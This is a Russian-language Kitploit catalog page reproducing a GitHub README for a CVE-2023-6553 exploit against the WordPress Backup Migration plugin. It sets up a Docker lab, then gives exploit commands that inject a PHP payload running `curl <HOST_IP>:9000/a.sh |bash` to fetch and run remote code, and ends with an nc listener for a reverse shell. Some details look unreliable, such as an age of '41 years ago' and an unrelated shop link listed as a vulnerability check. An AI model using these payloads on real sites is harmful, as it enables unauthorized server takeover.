Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-6553 — 针对WordPress中Backup Plugin的CVE-2023-6553漏洞利用开发 | Kitploit
Инструменты/GitHubGitHub/harshit-mashru/cve-2023-6553
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

针对WordPress中Backup Plugin的CVE-2023-6553漏洞利用开发

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-6553

Разработка эксплойта для CVE-2023-6553 на плагин Backup в Wordpress

Это критическое CVE с оценкой CVSS 9.8

Уязвимость позволяет злоумышленнику отправлять команды на сервер, работающий с уязвимой версией плагина

Уязвимая версия Backup <= 1.3.7

Установка

  1. клонируйте репозиторий через git

  2. Выполните команду ниже для запуска докер-контейнеров

root@kitploit:~
docker-compose up -d

Вы должны увидеть 2 докер-контейнера

  • Wordpress
  • SQL
  1. Теперь вы можете перейти на сайт Wordpress по IP-адресу докер-контейнера, также доступен по адресу
root@kitploit:~
http://localhost:8000/
  1. Чтобы установить уязвимый плагин Backup, выполните следующую команду
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Теперь войдите на сайт Wordpress, используя ссылку из шага 3, и установите плагин Backup после его загрузки с помощью команды выше

Эксплуатация

  1. Запустите слушатель на порту 9000, чтобы получать обратные вызовы при запуске эксплойта.
root@kitploit:~
python3 -m http.server
  1. Запустите go-скрипт с помощью следующей команды
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Вы получите следующую ошибку
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Это происходит потому, что после преобразований фильтра размер заголовка превышает допустимое сервером значение.

  1. Итак, теперь мы разбиваем команду на части, записываем это в файл на удаленном сервере, а затем выполняем его, но перед этим нам нужно запустить прослушивание для получения обратной оболочки (reverse shell)
root@kitploit:~
nc -nlvp 8080

а затем выполните команду для эксплуатации уязвимого плагина

root@kitploit:~
python3 final_exploit.py
  1. На этом этапе вы должны получить обратную оболочку

Ссылки

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Как легко проверить, присутствует ли уязвимая версия Wordpress: https://www.thetraveloutlier.com/shop/​
Скачать инструмент